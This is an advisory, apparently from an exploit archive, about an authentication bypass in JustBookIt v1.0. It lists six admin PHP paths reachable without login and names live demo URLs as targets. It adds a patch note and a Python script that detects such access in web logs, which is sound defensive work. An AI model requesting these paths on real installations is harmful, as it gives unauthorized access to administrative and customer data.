Vendor: JustBookIt
By: G4N0K
CVSS: 7.5 (HIGH)
Vulnerability Type: Authentication Bypass
CWE: 287
Product Name: JustBookIt
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:u_and_m_software:justbookit
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

U&M Software JustBookIt v1.0 Auth Bypass Vulnerability

U&M Software JustBookIt v1.0 is vulnerable to an authentication bypass. An attacker can bypass the admin login by using one of the paths listed in the exploit:

http://localhost/[path]/admin/user_manual.php
http://localhost/[path]/admin/user_config.php
http://localhost/[path]/admin/user_kundnamn.php
http://localhost/[path]/admin/user_kundlista.php
http://localhost/[path]/admin/user_aktiva_kunder.php
http://localhost/[path]/admin/database.php

Live examples of this exploit can be found at http://www.justbookit.uochm.com/demo/admin/index.php and http://www.justbookit.uochm.com/demo/admin/user_config.php.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the software to the latest version.
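
One way to check a web server access log for use of the paths listed above, as an added example that is not part of the original advisory or the vendor's code. It assumes Apache combined log format, that a successful admin login is a POST to admin/index.php answered with a 302 redirect, and that clients can be told apart by IP address; the function name and the sample log lines are constructed for illustration.

```python
import re

# Admin scripts named in the advisory as reachable without logging in.
UNGUARDED = {
    "user_manual.php", "user_config.php", "user_kundnamn.php",
    "user_kundlista.php", "user_aktiva_kunder.php", "database.php",
}
# Assumption: a successful login is a POST to admin/index.php answered with 302.
LOGIN_SCRIPT = "index.php"

# Combined log format: ip - user [time] "METHOD path PROTO" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
# Script name directly under an admin/ directory, ignoring any query string.
ADMIN = re.compile(r"/admin/(?P<script>[^/?#]+\.php)(?:[?#].*)?$", re.IGNORECASE)

def find_unauthenticated_admin_hits(lines):
    """Return (ip, timestamp, script) for each 200 response to a listed admin
    script from a client with no earlier login POST in the same log."""
    logged_in = set()
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        a = ADMIN.search(m["path"])
        if not a:
            continue  # not an admin script
        script = a["script"].lower()
        if script == LOGIN_SCRIPT and m["method"] == "POST" and m["status"] == "302":
            logged_in.add(m["ip"])
        elif script in UNGUARDED and m["status"] == "200" and m["ip"] not in logged_in:
            hits.append((m["ip"], m["ts"], script))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [07/Nov/2008:10:00:01 +0000] "POST /booking/admin/index.php HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [07/Nov/2008:10:00:05 +0000] "GET /booking/admin/user_config.php HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [07/Nov/2008:10:02:11 +0000] "GET /booking/admin/database.php HTTP/1.1" 200 2048 "-" "-"',
    '203.0.113.9 - - [07/Nov/2008:10:02:15 +0000] "GET /booking/admin/user_kundlista.php?page=2 HTTP/1.1" 200 900 "-" "-"',
    '203.0.113.9 - - [07/Nov/2008:10:02:20 +0000] "GET /booking/index.php HTTP/1.1" 200 700 "-" "-"',
]

if __name__ == "__main__":
    for ip, ts, script in find_unauthenticated_admin_hits(SAMPLE):
        print(f"{ts} {ip} reached admin/{script} with no prior login")
```

On a patched installation the same requests should no longer return 200, so any remaining hits point to an unpatched copy or a client sharing an IP address with a logged-in administrator.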

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	U&M Software JustBookIt v1.0 Auth Bypass Vulnerability
==============================================================================

	[»] Script:             [ U&M Software JustBookIt v1.0 ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.hotscripts.com/Detailed/79959.html ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 06.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[!] Use one of these paths to bypass admin login ;)
	
	[»] http://localhost/[path]/admin/user_manual.php
	[»] http://localhost/[path]/admin/user_config.php
	[»] http://localhost/[path]/admin/user_kundnamn.php
	[»] http://localhost/[path]/admin/user_kundlista.php
	[»] http://localhost/[path]/admin/user_aktiva_kunder.php
	[»] http://localhost/[path]/admin/database.php
	


===[ LIVE ]===

	[»] http://www.justbookit.uochm.com/demo/admin/index.php
	[»] http://www.justbookit.uochm.com/demo/admin/user_config.php


	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit(); //EoX
===============================================================================

# milw0rm.com [2008-11-07]